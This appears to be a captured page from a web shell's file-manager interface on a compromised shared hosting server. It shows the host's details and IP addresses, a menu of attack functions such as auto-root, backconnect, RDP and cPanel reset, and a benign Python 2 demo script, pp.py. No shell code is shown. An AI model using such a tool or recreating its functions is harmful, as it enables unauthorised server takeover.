Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib64 /
python2.7 /
Demo /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1009
B
-rw-r--r--
beer.py
458
B
-rwxr-xr-x
beer.pyc
703
B
-rw-r--r--
beer.pyo
703
B
-rw-r--r--
eqfix.py
6.16
KB
-rwxr-xr-x
eqfix.pyc
4.53
KB
-rw-r--r--
eqfix.pyo
4.53
KB
-rw-r--r--
fact.py
1.11
KB
-rwxr-xr-x
fact.pyc
1.14
KB
-rw-r--r--
fact.pyo
1.14
KB
-rw-r--r--
find-uname.py
1.18
KB
-rwxr-xr-x
find-uname.pyc
1.47
KB
-rw-r--r--
find-uname.pyo
1.47
KB
-rw-r--r--
from.py
873
B
-rwxr-xr-x
from.pyc
751
B
-rw-r--r--
from.pyo
751
B
-rw-r--r--
lpwatch.py
2.77
KB
-rwxr-xr-x
lpwatch.pyc
2.54
KB
-rw-r--r--
lpwatch.pyo
2.54
KB
-rw-r--r--
makedir.py
509
B
-rwxr-xr-x
makedir.pyc
732
B
-rw-r--r--
makedir.pyo
732
B
-rw-r--r--
markov.py
3.5
KB
-rwxr-xr-x
markov.pyc
3.93
KB
-rw-r--r--
markov.pyo
3.93
KB
-rw-r--r--
mboxconvert.py
3.11
KB
-rwxr-xr-x
mboxconvert.pyc
3.18
KB
-rw-r--r--
mboxconvert.pyo
3.18
KB
-rw-r--r--
morse.py
4.21
KB
-rwxr-xr-x
morse.pyc
4.33
KB
-rw-r--r--
morse.pyo
4.33
KB
-rw-r--r--
pi.py
887
B
-rwxr-xr-x
pi.pyc
921
B
-rw-r--r--
pi.pyo
921
B
-rw-r--r--
pp.py
3.72
KB
-rwxr-xr-x
pp.pyc
2.28
KB
-rw-r--r--
pp.pyo
2.28
KB
-rw-r--r--
primes.py
602
B
-rwxr-xr-x
primes.pyc
921
B
-rw-r--r--
primes.pyo
921
B
-rw-r--r--
queens.py
2.19
KB
-rwxr-xr-x
queens.pyc
2.95
KB
-rw-r--r--
queens.pyo
2.95
KB
-rw-r--r--
script.py
961
B
-rwxr-xr-x
script.pyc
1.21
KB
-rw-r--r--
script.pyo
1.21
KB
-rw-r--r--
unbirthday.py
3.07
KB
-rwxr-xr-x
unbirthday.pyc
2.93
KB
-rw-r--r--
unbirthday.pyo
2.93
KB
-rw-r--r--
update.py
2.68
KB
-rwxr-xr-x
update.pyc
2.69
KB
-rw-r--r--
update.pyo
2.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pp.py
#! /usr/bin/python2.7 # Emulate some Perl command line options. # Usage: pp [-a] [-c] [-d] [-e scriptline] [-F fieldsep] [-n] [-p] [file] ... # Where the options mean the following: # -a : together with -n or -p, splits each line into list F # -c : check syntax only, do not execute any code # -d : run the script under the debugger, pdb # -e scriptline : gives one line of the Python script; may be repeated # -F fieldsep : sets the field separator for the -a option [not in Perl] # -n : runs the script for each line of input # -p : prints the line after the script has run # When no script lines have been passed, the first file argument # contains the script. With -n or -p, the remaining arguments are # read as input to the script, line by line. If a file is '-' # or missing, standard input is read. # XXX To do: # - add -i extension option (change files in place) # - make a single loop over the files and lines (changes effect of 'break')? # - add an option to specify the record separator # - except for -n/-p, run directly from the file if at all possible import sys import getopt FS = '' SCRIPT = [] AFLAG = 0 CFLAG = 0 DFLAG = 0 NFLAG = 0 PFLAG = 0 try: optlist, ARGS = getopt.getopt(sys.argv[1:], 'acde:F:np') except getopt.error, msg: sys.stderr.write('%s: %s\n' % (sys.argv[0], msg)) sys.exit(2) for option, optarg in optlist: if option == '-a': AFLAG = 1 elif option == '-c': CFLAG = 1 elif option == '-d': DFLAG = 1 elif option == '-e': for line in optarg.split('\n'): SCRIPT.append(line) elif option == '-F': FS = optarg elif option == '-n': NFLAG = 1 PFLAG = 0 elif option == '-p': NFLAG = 1 PFLAG = 1 else: print option, 'not recognized???' if not ARGS: ARGS.append('-') if not SCRIPT: if ARGS[0] == '-': fp = sys.stdin else: fp = open(ARGS[0], 'r') while 1: line = fp.readline() if not line: break SCRIPT.append(line[:-1]) del fp del ARGS[0] if not ARGS: ARGS.append('-') if CFLAG: prologue = ['if 0:'] epilogue = [] elif NFLAG: # Note that it is on purpose that AFLAG and PFLAG are # tested dynamically each time through the loop prologue = [ 'LINECOUNT = 0', 'for FILE in ARGS:', ' \tif FILE == \'-\':', ' \t \tFP = sys.stdin', ' \telse:', ' \t \tFP = open(FILE, \'r\')', ' \tLINENO = 0', ' \twhile 1:', ' \t \tLINE = FP.readline()', ' \t \tif not LINE: break', ' \t \tLINENO = LINENO + 1', ' \t \tLINECOUNT = LINECOUNT + 1', ' \t \tL = LINE[:-1]', ' \t \taflag = AFLAG', ' \t \tif aflag:', ' \t \t \tif FS: F = L.split(FS)', ' \t \t \telse: F = L.split()' ] epilogue = [ ' \t \tif not PFLAG: continue', ' \t \tif aflag:', ' \t \t \tif FS: print FS.join(F)', ' \t \t \telse: print \' \'.join(F)', ' \t \telse: print L', ] else: prologue = ['if 1:'] epilogue = [] # Note that we indent using tabs only, so that any indentation style # used in 'command' will come out right after re-indentation. program = '\n'.join(prologue) + '\n' for line in SCRIPT: program += ' \t \t' + line + '\n' program += '\n'.join(epilogue) + '\n' import tempfile fp = tempfile.NamedTemporaryFile() fp.write(program) fp.flush() if DFLAG: import pdb pdb.run('execfile(%r)' % (fp.name,)) else: execfile(fp.name)
Close